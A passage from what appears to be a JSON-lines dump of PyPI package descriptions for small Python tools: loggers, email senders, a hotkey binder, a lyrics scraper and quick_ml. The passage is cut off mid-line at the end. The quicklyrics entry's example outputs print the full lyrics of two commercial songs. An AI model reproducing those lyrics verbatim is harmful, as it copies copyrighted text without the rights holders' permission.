thatmlogcan now\nbe dispatched with level:from quick_logger import mlog\n# Previously any level beyond info:\nmlog(\"Here's a debug message.\", \"debug\")\n# Now, can use the same idiom as `logger.`:\nmlog.debug(\"Here's a debug message.\")Note that the original syntax is still backward-compatible, on the offchace anything out there uses this.Ultimately, this package isverysimple, you probably just want to use the base Python logging library.InstallationUse pip to install.python -m pip install quick_loggerUsageUseinit_loggerto create a log file, andmlogto add a log entry.Quick Startinit_loggerfromquick_loggerimportinit_logger,mloginit_logger('/path/to/file.log')By default, the log file will be set tologging.INFO.mlog# By default logs are set to \"info\"mlog(\"Logged something!\")# Invoke by levelmlog.error(\"Something went wrong!\")It's that easy!\"Advanced\" SetupYou can set afewoptions when you useinit_logger.level: Defaults toinfo, acceptscritical,error,warning,info,debug,notset.fmt: Defaults to'%(asctime)s:: %(levelname)s:: %(message)s'. Seelogging.Formatterfor details on how to set aFormatterstring.datefmt: Defaults to'%Y-%m-%d %H:%M:%S'. Seestrftime reference.fromquick_loggerimportinit_logger# Log file set to debuginit_logger('/path/to/file.log',level='debug')...# Log file with fmt that includes module.fmt='%(asctime)s::%(module)s::%(message)s'# or log file with fmt that just has messages.fmt='%(message)s'init_logger('/path/to/file.log',fmt=fmt)...# Omit date, just include the time.init_logger('/path/to/file.log',datefmt='%H:%M:%S')Issues/SuggestionsPlease make any suggestions or issues on the Github page. Note that this package is meant to be simple, so suggestions should keep that in mind.LicenseThis project is licensed under the MIT License. Please see the LICENSE.md file for details."} +{"package": "quicklogging", "pacakge-description": "My logging helper libraryQuicklogging is intended for 2 purposes:shrink the boilerplate I need before I can log something by a few bits,without changing the body of source code, change quick and dirtyprint()\u2019ing scripts into\nenterprise class software that logs.What quicklogging doesQuicklogging provides you with handy loggers named after the current module.importquickloggingmy_logger=quicklogging.get_logger()This allows for silencing or raising the logging level for a specific part or a\nwhole hierarchy of (sub-)packages (ie. folders, in Python\u2019s slang).Quicklogging can handle legacy calls toprint(). This means that the working code can stay\nas-is and still get loggedimportquicklogging# Catches prints in the current modulequicklogging.catch_prints()# Catches prints everywhere in the Python processquicklogging.catch_prints(catch_all=True)# -> does not print to stdout anymore, but is logged.print(\"hello world\")What quicklogging does NOTQuicklogging does not configure the logging formatting or output as this would\nnot save any line; here is a basic example for general purpose code:Quick\nsurvival guide with the logging module.Quicklogging qualityQuicklogging is covered by a test suite and has been working for years for me, but I wouldn\u2019t promise there is no bug.I have tried documenting the code but would welcome proofreading; the API may change after discussion."} +{"package": "quicklogs", "pacakge-description": "Easily create and configure Python loggers from single function call, optionally using environment variable instead of function arguments.Installpip install quicklogsUsageThere is one function:get_loggerfromquicklogsimportget_loggerSeearguments and docs"} +{"package": "quicklook", "pacakge-description": "quicklookAn easy way to view numpy arrays.Here are thedocs"} +{"package": "quicklooktimeseries", "pacakge-description": "No description available on PyPI."} +{"package": "quicklookts", "pacakge-description": "No description available on PyPI."} +{"package": "quicklookts07", "pacakge-description": "No description available on PyPI."} +{"package": "quicklookts08", "pacakge-description": "No description available on PyPI."} +{"package": "quicklooper", "pacakge-description": "Quick LooperA simple polling style loop, run in a separate thread.InstallationInstall from PyPI:pip install quicklooperHow to useMake a class that inherits from the Looper class, and override themainmethod with code to be run each loop. The loop period may be set by assigning a float value to the class variable_intervalor by passing theintervalkeyword arg to theLooper.__init__method.Override theon_start_upandon_shut_downmethods to add any code to be run before the first loop, and after the final loop whenstopis called.Example of a basic app which polls the/printfilesdirectory for new files to print:from quicklooper import Looper\n\n\nclass PrintMonitor(Looper):\n _interval = 10.0\n\n def __init__(self, directory: str):\n self.directory: str = directory\n self._printed_files: Set[str] = set()\n\n def on_start_up():\n self._printed_files = {file for file in os.listdir(self.directory)}\n\n def main():\n for file in os.listdir(self.directory):\n send_to_printer(file) # implementation not shown\n self._printed_files.add(file)\n\n\nif __name__ == '__main__':\n print_monitor = PrintMonitor('/printfiles')\n print_monitor.start()Whenprint_montitor.start()is called, the app runson_start_upmethod, and then callsmainevery\nten seconds to scan for new files to print.Callstopto exit the loop immediately."} +{"package": "quicklst", "pacakge-description": "QuicklstQuicklst ist a python library for reading .lst files produced by FAST ComTec's mpa system. It uses numba to accelerate\nthe reading of the file and supports block or chunk wise loading of large files.Limitations: Both MPA3 and MPA4A files are supported, but they need to be in binary form not in ASCII encoding, the real\ntime clock is not implemented either.Basic usage is demonstrated inexamples/Quickstart.ipynb."} +{"package": "quickly", "pacakge-description": "Homepage\u2022Development\u2022Download\u2022Documentation\u2022LicenseThequicklypython package is able to create and manipulate LilyPond music\ndocuments. LilyPond documents often use the.lyextension, hence the name.It is currently in an early development stage, but slated to become the\nsuccessor of thepython-lypackage. Like python-ly, it provides tools to\nmanipulateLilyPondmusic documents, but instead of using the lexer in\npython-ly, which is very difficult to maintain, it uses the newparcepackage for parsingLilyPondfiles.ly.domandly.musicare superseded byquickly.domwhich provides a\nway to both build a LilyPond source file from scratch (likely.dom) and\nmanipulate an existing document (likely.music). Most of the functionality\nthat in python-ly is implemented at the token level, like transposing and\nrhythm manipulations, now works on the musical representation provided byquickly.dom, which looks a lot likely.music.This module is written and maintained by Wilbert Berendsen, and will, as it\ngrows, also contain (adapted) code from python-ly that was contributed by\nothers. Python 3.6 and higher is supported. Besides Python itself the most\nrecent version of theparcemodule is needed. Testing is done by runningpytest-3in the root directory.The documentation reflects which parts are already working :-) Enjoy!"} +{"package": "quicklyrics", "pacakge-description": "Powerful Library To Search Music LyricsInstallationQuickLyrics can be installed using pip from PyPI or from GitHubvia PyPI using pippipinstall-Uquicklyricsvia GitHub using pip+gitpipinstall-Ugit+https://github.com/rishabh3354/QuickLyricsUsageTo use QuickLyrics is easy, but let's see some examples:Example #1fromquicklyrics.lyricsimportSearchBySongres=SearchBySong(\"faded\").results()The above command will return the following:[{\"song\":\"faded\",\"artist\":\"alanwalker\",\"web_url\":\"https://www.azlyrics.com/lyrics/alanwalker/faded.html\"},{\"song\":\"fadedonme\",\"artist\":\"alexanderludwig\",\"web_url\":\"https://www.azlyrics.com/lyrics/alexanderludwig/fadedonme.html\"},{\"song\":\"fadedinmylastsong\",\"artist\":\"nct\",\"web_url\":\"https://www.azlyrics.com/lyrics/nct/fadedinmylastsong.html\"},{\"song\":\"fadedou\",\"artist\":\"askingalexandria\",\"web_url\":\"https://www.azlyrics.com/lyrics/askingalexandria/fadedout.html\"},{\"song\":\"faded\",\"artist\":\"bushidozho\",\"web_url\":\"https://www.azlyrics.com/lyrics/bushidozho/faded.html\"}]Example #2fromquicklyrics.lyricsimportSearchArtistsres=SearchBySong().results_by_url(\"https://www.azlyrics.com/lyrics/alanwalker/faded.html\")# Note: You can get lyrics web url from example #4The above command will return the following:{\"status\":true,\"lyrics\":\"\\n\\r\\nYou were the shadow to my light\\nDid you feel us?\\nAnother star\\nYou fade away\\nAfraid our aim is out of sight\\nWanna see us\\nAlight\\n\\nWhere are you now?\\nWhere are you now?\\nWhere are you now?\\nWas it all in my fantasy?\\nWhere are you now?\\nWere you only imaginary?\\n\\nWhere are you now?\\nAtlantis\\nUnder the sea\\nUnder the sea\\nWhere are you now?\\nAnother dream\\nThe monster's running wild inside of me\\nI'm faded\\nI'm faded\\nSo lost, I'm faded\\nI'm faded\\nSo lost, I'm faded\\n\\nThese shallow waters never met what I needed\\nI'm letting go a deeper dive\\nEternal silence of the sea, I'm breathing\\nAlive\\n\\nWhere are you now?\\nWhere are you now?\\nUnder the bright but faded lights\\nYou've set my heart on fire\\nWhere are you now?\\nWhere are you now?\\n\\nWhere are you now?\\nAtlantis\\nUnder the sea\\nUnder the sea\\nWhere are you now?\\nAnother dream\\nThe monster's running wild inside of me\\nI'm faded\\nI'm faded\\nSo lost, I'm faded\\nI'm faded\\nSo lost, I'm faded\\n\"}Example #3fromquicklyrics.lyricsimportSearchArtistsres=SearchArtists(\"R\").results()The above command will return the following:[\"R3HAB\",\"R5\",\"Ra\",\"Rabbitt, Eddie\",\"RAC\",\"Racal, Maris\",\"Rachael Yamagata\",\"Rachel Chinouriri\",\"Rachel Crow\",\"Rachel Farley\",\"Rachel Grae\",\"Rachelle Ann Go\",\"Rachel Platten\",\"Rachel Stevens\",\"Rachel Taylor\",\"Rachel Wammack\",\"Raconteurs, The\",\"Racoon\",\"Radiant Children\",\"RADICAL\"]Example #4fromquicklyrics.lyricsimportSearchByArtistsres=SearchByArtists(\"Rihanna\").results()The above command will return the following:{\"artist\":\"Rihanna\",\"albums\":[{\"album_name\":\"album: \\\"Music Of The Sun\\\" (2005)\",\"songs\":[\"Pon De Replay\",\"Here I Go Again\",\"If It's Lovin' That You Want\",\"You Don't Love Me (No, No, No)\",\"That La, La, La\",\"The Last Time\",\"Willing To Wait\",\"Music Of The Sun\",\"Let Me\",\"Rush\",\"There's A Thug In My Life\",\"Now I Know\",\"Pon De Replay (Remix)\"]},{\"album_name\":\"album: \\\"A Girl Like Me\\\" (2006)\",\"songs\":[\"SOS\",\"Kisses Don't Lie\",\"Unfaithful\",\"We Ride\",\"Dem Haters\",\"Final Goodbye\",\"Break It Off\",\"Crazy Little Thing Called Love\",\"Selfish Girl\",\"P.S. (I'm Still Not Over You)\",\"A Girl Like Me\",\"A Million Miles Away\",\"If It's Lovin' That You Want Pt. 2\",\"Who Ya Gonna Run To?(Deluxe Edition Bonus Track)\",\"Coulda Been The One(Deluxe Edition Bonus Track)\",\"Should I?(Deluxe Edition Bonus Track)\",\"Hypnotized(Deluxe Edition Bonus Track)\"]},{\"album_name\":\"album: \\\"Good Girl Gone Bad\\\" (2007)\",\"songs\":[\"Umbrella\",\"Push Up On Me\",\"Don't Stop The Music\",\"Breakin' Dishes\",\"Shut Up And Drive\",\"Hate That I Love You\",\"Say It\",\"Sell Me Candy\",\"Lemme Get That\",\"Rehab\",\"Question Existing\",\"Good Girl Gone Bad\",\"Cry(Japanese Bonus Track)\",\"Haunted(Japanese Bonus Track)\",\"Disturbia(Good Girl Gone Bad: Reloaded)\",\"Take A Bow(Good Girl Gone Bad: Reloaded)\",\"If I Never See Your Face Again(Good Girl Gone Bad: Reloaded)\"]},{\"album_name\":\"album: \\\"Rated R\\\" (2009)\",\"songs\":[\"Mad House\",\"Wait Your Turn\",\"Hard\",\"Stupid In Love\",\"Rockstar 101\",\"Russian Roulette\",\"Fire Bomb\",\"Rude Boy\",\"Photographs\",\"G4L\",\"Te Amo\",\"Cold Case Love\",\"The Last Song\",\"Hole In My Head(Nokia Comes With Music Bonus Track)\"]}]}Example #5fromquicklyrics.lyricsimportSearchByArtistAndSongres=SearchByArtistAndSong(\"Rihanna\",\"Love The Way You Lie Part II\").results()The above command will return the following:{\"artist\":\"rihanna\",\"song\":\"lovethewayyouliepartii\",\"lyrics\":[\"\\n\\r\\nOn the first page of our story\\nThe future seemed so bright\\nThen this thing turned out so evil\\nI don't know why I'm still surprised\\nEven angels have their wicked schemes\\nAnd you take that to new extremes\\nBut you'll always be my hero\\nEven though you've lost your mind\\n\\nJust gonna stand there and watch me burn\\nWell, that's alright because I like the way it hurts\\nJust gonna stand there and hear me cry\\nWell, that's alright because I love the way you lie\\nI love the way you lie, oh\\nI love the way you lie\\n\\nNow there's gravel in our voices\\nGlass is shattered from the fight\\nIn this tug of war, you'll always win\\nEven when I'm right\\n'Cause you feed me fables from your head\\nWith violent words and empty threats\\nAnd it's sick that all these battles\\nAre what keeps me satisfied\\n\\nJust gonna stand there and watch me burn\\nWell, that's alright because I like the way it hurts\\nJust gonna stand there and hear me cry\\nWell, that's alright because I love the way you lie\\nI love the way you lie, oh\\nI love the way you lie, oh\\n\\nSo maybe I'm a masochist\\nI try to run, but I don't wanna ever leave\\n'Til the walls are going up\\nIn smoke with all our memories\\n\\nIt's morning, you wake, a sun ray hits your face\\nSmeared makeup as we lay in the wake of destruction (Shh)\\nHush baby, speak softly, tell me you're awfully sorry\\nThat you pushed me into the coffee table last night so I can push you off me\\nTry and touch me so I can scream at you not to touch me\\nRun out the room and I'll follow you like a lost puppy\\nBaby, without you, I'm nothing, I'm so lost, hug me\\nThen tell me how ugly I am, but that you'll always love me\\nThen after that, shove me, in the aftermath of the\\nDestructive path that we're on, two psychopaths, but we\\nKnow that no matter how many knives we put in each other's backs\\nThat we'll have each other's backs 'cause we're that lucky\\nTogether, we move mountains, let's not make mountains out of molehills\\nYou hit me twice, yeah, but who's counting?\\nI may have hit you three times, I'm starting to lose count\\nBut together, we'll live forever, we found the youth fountain\\nOur love is crazy, we're nuts, but I refused counseling\\nThis house is too huge, if you move out, I'll burn all two thousand\\nSquare feet of it to the ground, ain't shit you can do about it\\n'Cause with you, I'm in my fucking mind, without you, I'm out it\\n\\nJust gonna stand there and watch me burn\\nWell, that's alright because I like the way it hurts\\nJust gonna stand there and hear me cry\\nWell, that's alright because I love the way you lie\\nI love the way you lie\\nI love the way you lie\\nI love the way you lie\\nI love the way you lie\\n\",\"\"]}"} +{"package": "quickmacapp", "pacakge-description": "NoteThis is extremely rough and poorly documented at this point. While its\npublic API is quite small to avoidunduechurn, it may change quite\nrapidly and if you want to use this to ship an app you probably will want\nto contribute to it as well.Make it easier to write small applications for macOS in Python, using Twisted.To get a very basic status menu API:fromquickmacappimportmainpoint,Status,answer,quitfromtwisted.internet.deferimportDeferred@mainpoint()defapp(reactor):s=Status(\"\u2600\ufe0f \ud83d\udca3\")s.menu([(\"Do Something\",lambda:Deferred.fromCoroutine(answer(\"something\"))),(\"Quit\",quit)])app.runMain()Packaging this into a working app bundle is currently left as an exercise for\nthe reader.This was originally extracted fromhttps://github.com/glyph/Pomodouroboros/"} +{"package": "quickmachotkey", "pacakge-description": "This is a set of minimal Python bindings for the undocumented macOS framework\nAPIs that eventhe most modern, sandboxing-friendly shortcut-binding\nframeworksuse under the hood for actually binding global hotkeys.Unlike something full-featured like MASShortcut, this provides no configuration\nUI; you have to provide keyboard constants directly.Simple example:fromquickmachotkeyimportquickHotKey,maskfromquickmachotkey.constantsimportkVK_ANSI_X,cmdKey,controlKey,optionKey@quickHotKey(virtualKey=kVK_ANSI_X,modifierMask=mask(cmdKey,controlKey,optionKey))defhandler()->None:print(\"handled \u2318\u2303\u2325X\")if__name__==\"__main__\":fromAppKitimportNSApplication# type:ignore[import]fromPyObjCToolsimportAppHelper# type:ignore[import]print(\"type \u2318\u2303\u2325X with any application focused\")NSApplication.sharedApplication()AppHelper.runEventLoop()"} +{"package": "quickmail", "pacakge-description": "send email with one line using sslyou need a local_settings.py in the root of the virtualenv with this:# MAIL_CONFIG_DICT is required by for senderror_simple which is a function of the module quickmail# SMTP_SSL_HOST is a ssl enabled smtp host and SMTP_SSL_PORT is the port to use (usually 465)# MAIL_USER and MAIL_PASS refer to the email account to use to send error messages. MAIL_RECIPIENTS is a list of emails (strings) to be notified of errorsMAIL_CONFIG_DICT = {'SMTP_SSL_HOST': 'yourdomain.com','SMTP_SSL_PORT': 465,'MAIL_USER': 'you@yourdomain.com','MAIL_PASS': 'yourpass','MAIL_RECIPIENTS': ['you@yourdomain.com', friend@anotherdomain.com']}"} +{"package": "quick-mail", "pacakge-description": "Quick Mail CLIA command line interface to send mail without any hassle.Why this tool?Sending last minute mails using conventional tools can get annoying and tiresome. This CLI helps in such situation since it makes sending mail hassle-free and very quick. Use this tool to send mails quickly without leaving your terminal.InstallationInstall quick-mail from the Python Package Index (PyPi)$ pip install quick-mailOr manually from this repository.$ git clone https://github.com/avikumar15/quick-mail-cli\n\n* add line export PYTHONPATH=/path/to/project/quick-email-cli to ~/.bashrc *\n\n$ cd quick-mail-cli/\n\n* activate virtual environment *\n\n$ pip install -r requirements.txt\n$ pip install .Check installation by running$ quickmail --versionUsageTo use this:$ quickmail --helpusage: quickmail [-h] [-v] {clear,init,send,template} ...\n\nA command line interface to send mail without any hassle\n\npositional arguments:\n {clear,init,send,template}\n clear clear the body of message from local or even the token if\n --justdoit argument is added\n init initialise token and set your email id\n send send the mail\n template manage templates of mail body\n\noptional arguments:\n -h, --help show this help message and exit\n -v, --version print current cli versionCreate yourOAuth client IDand select app type as Desktop App and download the credentials.json file.Then run the init command to authenticate gmail, and generate token. This command is required to be run only once.$ quickmail init Now you are all set. Use the send command to send mail.$ quickmail send --helpusage: quickmail send [-h] -r RECEIVER -sub SUBJECT [-t TEMPLATE] [-b BODY]\n [-a ATTACHMENT] [-l]\n\nUse the send command to send mail. Body can be passed as an argument, or typed in\na nano shell. Use optional --lessgo command for sending mail without confirmation\n\noptional arguments:\n -h, --help show this help message and exit\n -r RECEIVER, --receiver RECEIVER\n receiver's email address, eg. '-r \"xyz@gmail.com\"'\n -sub SUBJECT, --subject SUBJECT\n email's subject, eg. '-sub \"XYZ submission\"'\n -t TEMPLATE, --template TEMPLATE\n template of email body, eg. '-t=\"assignment_template\"'\n -b BODY, --body BODY email's body, eg. '-b \"Message Body Comes Here\"'\n -a ATTACHMENT, --attachment ATTACHMENT\n email's attachment path, eg. '~/Desktop/XYZ_Endsem.pdf'\n -l, --lessgo skip confirmation before sending mailBody and attachments are optional arguments. Body can be either passed as an argument otherwise it can also be typed in the nano shell (Use -t argument to use a template body). Use the --lessgo (shorthand -l) to skip confirmation of mail, for quicker mail deliveries.To clear the cli storage, use the clear command. Use --justdoit (shorthand -j) to even remove the credential and token files from project directory, this extra argument would allow you to change your primary email address.$ quickmail clear --helpusage: quickmail clear [-h] [-j]\n\nUse the clear command to clear all email body that are saved in your home\ndirectories. Additionally, pass --justdoit to remove the credential files as well\n\noptional arguments:\n -h, --help show this help message and exit\n -j, --justdoit clear storage including the credentials and tokenTo manage templates use the template command.$ quickmail template --helpusage: quickmail template [-h] {add,listall,edit} ...\n\nmanage mail templates\n\npositional arguments:\n {add,listall,edit}\n add add a new template\n listall list all templates\n edit edit a particular template\n\noptional arguments:\n -h, --help show this help message and exitFollowing is a recording of the terminal session which records the usage ofquickmailfrom init command till send command.Improvements and BugsFound any bugs? Or have any suggestions, feel free to open an issue."} +{"package": "quick-mailer", "pacakge-description": "DescriptionThis Module help you to sendfast Email. \ud83c\udf38And you can attachimage, audio, and other files easily.The Module supportGmail And Microsoftright now, but in the nearly future will support other mail services.Installation:pip install quick-mailer-->> GitHub LinkUsage:Send MessagefrommailerimportMailermail=Mailer(email='someone@gmail.com',password='your_password')mail.send(receiver='someone@example.com',# Email From Any service Providerno_reply='noreplay@example.com',# Redirect receiver to another email when try to reply.subject='TEST',message='HI, This Message From Python :)')Parametersreceiver:EmailAddressasStringorList.[Required]cc:EmailAddressasStringorList.(CarbonCopy)[Optional]bcc:EmailAddressasStringorList.(BlindCarbonCopy)[Optional]sender_name:SetSendername.[Optional]receiver_name:Setreceivername.[Optional]no_reply:SetAnotherEmailToReply[Optional]subject:MessageTitle.[Optional]message:YourMessage.[Optional]image:ImageFileName.(ImagePath)[Optional]audio:AudioFileName.(AudioPath)[Optional]file:FileName.(AnyFilePath)[Optional]Check Send Status# Using (status) Attributeprint(mail.status)# Example For One Receiver:ifmail.status:passelse:pass# Note:# IF You Put List Emails Receivers# Variable Will Return Dictionary Results.# IF You Allowed Repeat# The Attribute Will provide Results List.Send Multi Filesmail.send(receiver='someone@example.com',# Email From Any service Providersubject='TEST',message='HI, This Message From Python :)',image='img.jpg',# Image File Pathaudio='sound.mp3',# Audio File Pathfile='file.zip')# Any File PathSettings Methodmail.settings(repeat=1,# To Repeat Sendingsleep=0,# To Sleep After Send Each Messageprovider=mail.GMAIL,# Set Maill Servicemulti=False)# Default False, If You Set True# Message Will Sent 4 Each Email Alone# Else Will Sent To All TogetherSend Multi Emails# One By One:mail.settings(multi=False)# In Same Message:mail.settings(multi=True)mail.send(receiver=['someone@example.com','someone1@example.com'],subject='TEST',message='HI, This Message From Python :)')Counter Variables# CC Receivers Countprint('CC count:',mail.count_cc)# BCC Receivers Countprint('BCC count:',mail.count_bcc)# Receivers Countprint('Receivers count:',mail.count_rec)# Messages Countprint('Messages count:',mail.count_msg)Example Functionfrommailerimportexampleexample()About Method# You Can Use (mail.about) Method for more info.mail.about()Changelogs2022.2.10 update:Fix issue #3 TypeError on python < 3.102022.2.2 update:Support Html MessageFix issue #1 TypeError on python < 3.10Follow Me on Instagram:@9_Tay. \ud83c\udf38Thank You :) \ud83c\udf38\ud83c\udf38"} +{"package": "quick-manage", "pacakge-description": "Quick IT Management ToolsThis is a set of lightweight IT management tools meant for small organizations and homelabs. It is meant to fall somewhere between the capabilities of bash scripts and ansible.The tools automate a handful of operations which I found myself having to repeatedly perform, but didn't have straightforward means of automation without jumping into much heavier and more complex solutions. The project is set up to provide a comfortable command line interface for manual and scripted use, while also being a fully usable Python 3 library.FeaturesI add these features as I have need of them, but suggestions and contributions are welcome:(All are in progress)Certificate checking and deploymentLocal hosts file managementLocal DNS static entry managementVyos wireguard managementDebuggingpipinstall--editable.Development InformationStartupFrom the command line, all persisted state is accessed through a singleton of theEnvironmentclass. This is retrieved from theEnvironment.default()method.During the first call toEnvironment.default()the environment is constructed. The configuration for theEnvironmentobject is provided by theQuickConfigclass. This in turn is constructed through theQuickConfig.default()static method, which attempts to load a configuration file from the default application configuration directory provided byclick.Object ConstructionThese mechanisms are messy and need to be streamlined once I have a better idea of all the things they need to do.Objects which provide functionality are constructed dynamically at runtime from stored configuration. TheEnvironmentobject has a field calledbuilderswhich is a simple dataclass that has twoIBuilderobjects, one for building context objects, and one for building key stores.AnIBuilderinstantiates objects at the request of callers. Types which the builder can produce must be registered using theregistermethod, which takes the name The default implementation of anIBuilderis theGenericBuilder(these might be able to be squashed into one later).Registering a type with the builder involves giving it a friendly string name for the type (this is the human-readable name used in configuration files), the type of the object to be built, and the type of the configuration object. Types which are built by a builder must have a class initializer which accepts an instance of the configuration object as the first argument.Configurations for objects are stored in the form of json/yaml dictionaries having three elements: (1) a stringname, (2) a stringtypewhich matches a string type name registered with the appropriate builder, and (3) aconfigdictionary that will be passed into the initializer of the configuration object. When something is going to be built, these three things are put into anEntityConfigobject which then gets given to the builder'sbuildmethod. It will first instantiate the configuration type usingdacite'sfrom_dictmethod on theconfigdictionary. Then it will instantiate the final object by passing this configuration object into the initializer for that class.All of this is basically a complicated way of managing dynamic configurations.HostsHosts are one of the main entities. A host represents a computer or something that acts like a computer. It has the following properties:A unique nameA text descriptionA list of client management mechanisms (ssh, api, etc)A set of type based configurations"} +{"package": "quickmaths", "pacakge-description": "No description available on PyPI."} +{"package": "quickmathsfunctions", "pacakge-description": "Python CI/CD with BuildkiteThis repository serves as a code container for the tutorial I wrote onBuildkite's blog.Blog link will be updated once the article is published.FeaturesSimple Utility functionsPublish documentation to Readthedocs.ioCI/CD with BuildkiteGetting StartedFollow these instructions to get the project up and running.# Clone the repogitclonehttps://github.com/ravgeetdhillon/buildkite-python-ci-cd# Change directory$cdbuildkite-python-ci-cd# Initialize virtual environment$python3-mvenvvenv# Install dependencies$pipinstallFor detailed instructions,read the blog.Tech StackPythonAuthorsRavgeet DhillonExtraYou are welcome to makeissues and feature requests.In case you get stuck somewhere, feel free to contact me viaMail."} +{"package": "quick-menu", "pacakge-description": "quick-menuThis is a simple package to create text menus for use in console applications.UsageA menu can be created quickly that can call a function with or without a value. An exit\nitem is automatically added to the menu.Create a Quick Menufromquick_menu.menuimportMenu,MenuItemdeffunc(val=1):print(\"func1: val =\",val)input(\"Press [Enter] to continue\")menu=Menu(\"Simple Menu\",menu_items=[MenuItem(\"1\",\"Func default\",action=func),MenuItem(\"2\",\"Func with val=4\",action=func,action_args={\"val\":4}),])menu.run()Output============== Simple Menu =============\n1: Func default\n2: Func with val=4\nX: Exit\n========================================\n>> 1\nfunc1: val = 1\nPress [Enter] to continue\n\n============== Simple Menu =============\n1: Func default\n2: Func with val=4\nX: Exit\n========================================\n>> 2\nfunc1: val = 4\nPress [Enter] to continueDocumentationThedocumentationis made withMaterial for MkDocsand is hosted byGitHub Pages.Installationpip install quick-menuLicensequick-menuis distributed under the terms of theMITlicense."} +{"package": "quickmin-step", "pacakge-description": "SEAMM QuickMin Plug-inA SEAMM plug-in for simple, quick minimizationFree software: BSD-3-ClauseDocumentation:https://molssi-seamm.github.io/quickmin_step/index.htmlCode:https://github.com/molssi-seamm/quickmin_stepFeaturesQuickMin provides quick, simple optimization of molecular structures using one of a\nnumber of forcefields. It is intended for small systems, with no more than about 300\natoms. Beyond that size it will be rather slow, but more importantly larger systems\ntypically have many local minima, often close to each other energetically, so the\nconcept of the minimum structure is not very useful.QuickMin usesOpenBabelfor the minimization. There are currently five forcefields\navailable:GAFF\u2013 the general AMBER force fieldMMFF94\u2013 the Merck molecular force fieldMMFF94s\u2013 the Merck molecular force field for energy minimizationGhemicalUFF\u2013 Universal force fieldThe first four have parameters for organic and biomolecular systems, while UFF attempts\nto cover the entire periodic table with reasonable accuracy. The more specialized\nforcefields tend to be more accurate, roughly in the order listed (though the two MMFF94\nare essentially similar). By default QuickMin will try each of the forcefields in the\norder given until it finds one that can handle the given molecule. You can specify the\nforcefield to use; however, if it does not have parameters for your molecule, QuickMin\nwill throw an error.AcknowledgementsThis package was created with themolssi-seamm/cookiecutter-seamm-plugintool, which\nis based on the excellentCookiecutter.Developed by the Molecular Sciences Software Institute (MolSSI), which receives funding\nfrom theNational Science Foundationunder award CHE-2136142.History2023.11.15 \u2013 Bugfix: structure handlingError putting the coordinates into a newly created configuration.2023.10.30 \u2013 Enhanced structure handling.Switched to standard handling of structures, which adds ability to name with the\nIUPAC name, InCHI, and InChIKey in addition to previous methods.2023.1.14 \u2013 Changed documentation to new style and theme.Switched the documentation to the MolSSI theme and di\u00e1taxis layout, though more work\nis needed.2022.11.7 \u2013 Internal ReleaseSwitching from LGTM code analysis to GitHub Actions using CodeQL, since LGTM is\nshutting down!2022.10.23 \u2013 Properties addedAdded a single property, \u2018total energy#QuickMin#\u2019, to store the final\nenergy in the database. Also added \u2018total energy\u2019 as a result for tables or\nvariables.2022.10.22 \u2013 Documentation!Got the documentation into reasonable shape.2022.10.20 \u2013 Initial Release!Provides quick minimization for smaller molecules, using OpenBabel. Probably\nreasonable for some few hundred atoms. Supports the following forcefields:GAFFMMFF94 & MMFF94s (which is optimized for minimization)GhemicalUFFThe default is the \u201cbest available\u201d forcefield, which tries them in the order given\nabove until it finds one that can handle the molecule."} +{"package": "quickml", "pacakge-description": "No description available on PyPI."} +{"package": "quick-ml", "pacakge-description": "quick_ml\u00a0\u00a0\u00a0\u00a0 :\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ML for everyoneOfficial Websitewww.quickml.infoquick_mlis a python package (pypi) which provides quick plug and plag prototypes to train Deep Learning Model(s) through optimized utilization of TPU computation power.Speed up your Deep Learning Experimentation Workflow by x20 times.No unncessary worrying about the details. Those have been taken care of by the library.Obtain results of Deep Learning Models on your dataset using minimal lines of code.Train Multiple Deep Learning Models in a go just by naming the model names. You need not to worry much about the internal working.Full control over the Deep Learning workflow & setting of parameters. All within a single or minimal function call(s).New Features!Rapidly train about 24 Deep Learning Pretrained Models in one session using TPUs.Quick & Easy TFRecords Dataset Maker. TFRecords expidite the training process. -Why quick_ml?Usual time taken to code & train a deep learning workflow for a single model is atleast 1.5 hrs to 2 hrs (given you are proficient in the field and you know what to code). Using quick_ml, you would be able to do this in less than 20 mins even if you are a beginner.Fast experimentation. That's it. Experimenting what works and what doesn't is tedious and tiresome.SpecificationsSupport forKaggle Notebooksw/TPU enabled ON.\nFor best performance, import the pretrained weights dataset in the Kaggle Notebook. (https://www.kaggle.com/superficiallybot/tf-keras-pretrained-weights)Tensorflow version==2.4.0Python 3.6+Note-> Don't import tensorflow in the beginning. With the upcoming updates in the tensorflow, it might take some time to reflect the corresponding changes to the package. The package is built and tested on the most stable version of tensorflow mentioned in the Specifications.Few Words about the packageThe idea behind designing the package was to\nreduce the unncessary training time for Deep Learning Models.\nThe experimentation time if reduced can help the people concerned with\nthe package to focus on the finer details which are often neglected.\nIn addition to this, there are several utility functions provided at a single\nplace aimed at expediting the ML workflow. These utility functions have been designed\nwith ease of use as the foremost priority and attempt has been made to\noptimize the TPU computation as well as bring in most of the functionalities. Attempt has been made to reduce about 500-700 lines of code or even more (depending on what you are about to use) to less than 10 lines of code. Hope you like it!Table of ContentsInstallationGetting StartedMaking Custom Datasets (TFRecords)Labeled DataUnlabeled DataVisualize & Check the DataBegin Working w/ TPUCreate Models QuicklyModels Training ReportCallbacksPredictionsK-Fold Training & PredictionsExamplesFeedback & DevelopmentUpcoming Features!LicenseInstallationYou can quickly get started with the package using pip command.!pip install quick-mlOnce you have installed quick_ml package, you can get started with your Deep Learning Workflow.Quickly check whether the correct version of tenserflow has been installed and import tensorflow by the following statement.import tensorflow as tf\nimport quick_mlCheck the output to know about the status of your installation. Also add,Getting StartedLet's begin exploring the package.Making Custom Datasets (TFRecords)To obtain the best performance using TPUs, the package accepts only TFRecords Dataset(s).\nEither you have ready-made TFRecords Dataset or you want to obtain TFRecords Dataset for your own image data. This section is devoted to explaining about how to obtain your own Image Dataset TFRecords.Note-> To utilize the TFRecords dataset created, ensure that the dataset is public while uploading on Kaggle.Note-> No need to haveTPU ONfor making TFRecords files. Making TFRecords is CPU computation.Note-> It is better to make TFRecords dataset on Google Colab ( > 75 GB) as Kaggle Kernels have limited Disk Space( < 5 GB). Download the datasets after you are done. Upload them on Kaggle as public datasets. Input the data in the Kaggle Notebooks.Let's get started withtfrecords_makermodule ofquick_mlpackage.Labeled DataFor Labeled Data, make sure that the dataset follows the following structure ->/ Data-Class1-Class2-Class3-ClassNwhere Class1, Class2, .. , ClassN denote the folders of images as well the class of the images. These shall serve as the labels for classification.This is usually used for training and validation data.However, it can also be used to create labeled Test Data.To make labeled data, there are 2 options.Convert entire image folder to tfrecords file.Split the Image Dataset folder in a specified ratio & make tfrecords files.A) Convert entire image folder to tfrecords filefrom quick_ml.tfrecords_maker import 